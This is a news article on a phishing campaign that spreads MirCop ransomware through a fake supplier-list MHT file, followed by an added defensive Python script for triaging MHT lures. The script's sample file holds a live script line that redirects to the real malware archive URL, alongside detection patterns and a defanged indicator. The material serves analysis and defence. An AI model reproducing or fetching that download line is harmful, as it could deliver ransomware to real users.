Phishing emails deliver spooky zombie-themed MirCop ransomware
A new phishing campaign posing as supplier lists infects users with the MirCop ransomware, which encrypts a target system's files in under fifteen minutes.
The actors begin the attack by sending an unsolicited email to the victim, supposedly following up on a previous arrangement about an order.
The email body contains a hyperlink to a Google Drive URL, which, if clicked, downloads an MHT file (webpage archive) onto the victim’s machine.
Google Drive lends the email legitimacy and fits common day-to-day business practice.
For threat actors, simple but key choices like this can make the difference between the victim clicking the URL and sending the email to the spam folder.
Those who open the file can only see a blurred image of what is supposedly a supplier list, stamped and signed for an extra touch of legitimacy.
When the MHT file is opened, it downloads a RAR archive containing a .NET malware downloader from “hXXps://a[.]pomf[.]cat/gectpe.rar”.
The RAR archive contains an EXE file, which uses VBS scripts to drop and execute the MirCop payload on the infected system.
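Because an MHT is just a MIME multipart archive, the lure stage of this chain can be triaged offline with nothing but the standard library. The script below is an added example and is not code from the article, from Cofense, or from the threat actors: it parses an MHT, lists its parts, extracts every URL, and flags active content, archive downloads, and any URL matching a defanged watchlist (seeded with the indicator quoted above). The sample MHT is constructed; the article does not say how the real lure triggered the download, so the inline script pointing at the RAR is an assumption used only to exercise the checks.

```python
"""Triage an MHT (MIME HTML web archive) lure offline.

Added example: parses the archive with the standard library, extracts URLs
from every part, and flags active content, archive downloads and known
indicators.
"""
import email
import re
from email import policy

# Indicator quoted in the article (from the Cofense report), kept defanged.
DEFANGED_IOCS = ["hXXps://a[.]pomf[.]cat/gectpe.rar"]

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
# A supplier list rendered as an image has no business carrying script.
ACTIVE_RE = re.compile(r"<script|vbscript:|ActiveXObject|<object|<iframe",
                       re.IGNORECASE)
ARCHIVE_EXT = (".rar", ".zip", ".7z", ".iso", ".img")


def refang(ioc):
    """Turn a defanged indicator back into a matchable, lower-cased URL."""
    return ioc.replace("hXXp", "http").replace("[.]", ".").lower()


IOCS = {refang(i) for i in DEFANGED_IOCS}


def analyze_mht(raw):
    """Return part types, URLs found and a list of human-readable flags."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {"parts": [], "urls": [], "flags": []}
    for part in msg.walk():
        if part.is_multipart():
            continue  # container nodes carry no payload of their own
        ctype = part.get_content_type()
        report["parts"].append(ctype)
        body = part.get_payload(decode=True) or b""  # undo base64/QP
        text = body.decode("utf-8", "replace")
        for url in URL_RE.findall(text):
            report["urls"].append(url)
            if url.lower().endswith(ARCHIVE_EXT):
                report["flags"].append(f"archive download: {url}")
            if url.lower() in IOCS:
                report["flags"].append(f"known indicator: {url}")
        if ctype.startswith("text/") and ACTIVE_RE.search(text):
            report["flags"].append(f"active content in {ctype} part")
    return report


# Constructed sample: one HTML part showing a "blurred" image, plus the image.
# The redirect to the RAR is an assumption about how the lure fetched its
# second stage; the article only states that opening the MHT downloads it.
SAMPLE_MHT = b"""MIME-Version: 1.0
Content-Type: multipart/related; boundary="----=_NextPart_000"

------=_NextPart_000
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit

<html><body><img src="cid:supplierlist">
<script>window.location = "https://a.pomf.cat/gectpe.rar";</script>
</body></html>
------=_NextPart_000
Content-Type: image/png
Content-Transfer-Encoding: base64
Content-ID: <supplierlist>

iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==
------=_NextPart_000--
"""

if __name__ == "__main__":
    result = analyze_mht(SAMPLE_MHT)
    print("parts:", result["parts"])
    print("urls:", result["urls"])
    for flag in result["flags"]:
        print("FLAG:", flag)
```

Run it against a real `.mht` with `analyze_mht(open(path, "rb").read())`. Any flag is a reason to detonate the file in a sandbox rather than open it on a workstation; an MHT that claims to be a scanned document but carries script or reaches out for an archive matches the delivery pattern described above.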
The ransomware activates immediately: it starts taking screenshots, encrypts files, changes the desktop background to a horrid zombie-themed image, and presents the victim with instructions on what to do next.
According to Cofense, this whole process takes less than 15 minutes from the moment the victim opens the phishing email.
After that, the user is only allowed to open specific web browsers to communicate with the actors and arrange the payment of the ransom.
The actors are not interested in sneaking into the victim’s machine stealthily or staying there for long to conduct cyber-espionage or steal files for extortion.
On the contrary, the attack unfolds rapidly, and the source of the trouble quickly becomes evident to the victim.
MirCop is an old ransomware strain that used to deliver absurd ransom demands to its victims.
That was until Michael Gillespie cracked its encryption and released a working decryptor for free.
We were unable to test whether that old decryptor works with the payloads dropped in the most recent campaign, but it is possible that it can still unlock the files.
Cofense says the same variant has been in circulation since June this year, so MirCop is still out there, and people need to be cautious when handling unsolicited emails.